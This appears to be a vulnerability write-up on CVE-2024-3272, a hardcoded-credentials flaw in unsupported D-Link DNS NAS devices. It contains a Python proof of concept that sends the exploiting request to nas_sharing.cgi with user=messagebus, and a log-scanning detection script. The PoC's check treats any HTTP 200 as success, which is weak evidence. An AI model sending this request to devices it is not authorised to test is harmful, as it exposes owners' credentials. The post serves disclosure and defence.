In this post, we'll take a detailed look at a very critical vulnerability (CVE-2024-3272) found in unsupported D-Link DNS products, specifically the DNS-320L, DNS-325, DNS-327L, and DNS-340L models up to firmware version 20240403. The vulnerability is also tracked as VDB-259283 and affects unspecified processing in the file /cgi-bin/nas_sharing.cgi, part of the HTTP GET request handler. It can be exploited remotely by setting the 'user' argument to the input 'messagebus', leading to hardcoded credentials being exposed. We will also outline the details of the exploit and provide relevant reference links.

Code Snippet

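import requests

# Replace <target_IP> with the address of a device you are authorized to test.
target_url = "http://<target_IP>/cgi-bin/nas_sharing.cgi"
params = {
    "action": "get_shared_folders",
    "sid": "dummySID",
    "user": "messagebus"  # the input named in the advisory
}

# A timeout keeps the script from hanging on an unreachable host.
response = requests.get(target_url, params=params, timeout=10)

# HTTP 200 only shows that the handler answered the request;
# inspect the response body before treating the device as confirmed.
if response.status_code == 200:
    print("Hardcoded credentials found!")
else:
    print("Target not vulnerable.")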

This Python code snippet demonstrates how an attacker can send an HTTP GET request with the 'user' parameter set to 'messagebus' to target the vulnerable D-Link DNS devices. If the targeted device is indeed vulnerable, hardcoded credentials will be exposed.

Exploit Details

The vulnerability allows an attacker to remotely initiate an attack against devices with firmware versions up until 20240403 by setting the 'user' argument to the value 'messagebus'. This exploit can potentially grant unauthorized access to critical system information and could lead to further compromise or malicious actions.

This vulnerability affects products that are no longer supported by the manufacturer and have reached their end-of-life (EOL). The vendor was contacted and immediately confirmed that the products in question are EOL.

Recommendations

Given the very critical nature of this vulnerability and the fact that the affected products are no longer supported, it is highly recommended that users of the vulnerable D-Link DNS devices:

1. Immediately retire and replace the unsupported devices with updated, supported models.

2. Review and strengthen their network security measures to mitigate potential risks posed by this vulnerability.
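To support the network review recommended above, the following added example (not part of the original post or of any vendor tooling) flags web access-log entries that request nas_sharing.cgi with user=messagebus, including percent-encoded variants. It assumes combined-format logs from a proxy or sensor in front of the NAS; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined/common log format: client, identity, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
VULN_PATH = "/cgi-bin/nas_sharing.cgi"  # handler named in the advisory
VULN_USER = "messagebus"                # input named in the advisory

def flag_requests(lines):
    """Return (client, time, status, target) for requests matching the CVE-2024-3272 pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m["target"])
        # Decode percent-escapes so an encoded path still matches.
        if unquote(url.path) != VULN_PATH:
            continue
        # parse_qs decodes percent-escapes in values and keeps repeated parameters.
        users = parse_qs(url.query, keep_blank_values=True).get("user", [])
        if VULN_USER in users:
            hits.append((m["client"], m["time"], int(m["status"]), m["target"]))
    return hits

# Constructed sample lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Apr/2024:08:15:02 +0000] "GET /cgi-bin/nas_sharing.cgi?action=get_shared_folders&sid=dummySID&user=messagebus HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Apr/2024:08:16:40 +0000] "GET /cgi-bin/nas_sharing.cgi?user=%6dessagebus&action=get_shared_folders HTTP/1.1" 200 87',
    '192.0.2.14 - - [10/Apr/2024:08:17:11 +0000] "GET /cgi-bin/nas_sharing.cgi?user=alice&action=get_shared_folders HTTP/1.1" 401 0',
    '192.0.2.14 - - [10/Apr/2024:08:18:55 +0000] "GET /index.html?user=messagebus HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, when, status, target in flag_requests(SAMPLE_LOG):
        print(f"{when} {client} status={status} {target}")
```

Any hit from an address outside the management network is a reason to isolate the device and check it for compromise before it is retired.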

References

For further information and original references about the vulnerability, please refer to the following links:

1. CVE-2024-3272
2. D-Link DNS Product Security Advisory
3. VDB-259283: Vulnerability Details and Disclosure

Conclusion

CVE-2024-3272 is a very critical vulnerability that has been discovered in unsupported D-Link DNS products, potentially exposing hardcoded credentials and allowing attackers unauthorized access to sensitive system information. It is crucial for users to retire and replace the affected devices and take necessary precautions to protect their networks from potential attacks.

Timeline

Published on: 04/04/2024 01:15:50 UTC
Last modified on: 05/23/2024 18:11:31 UTC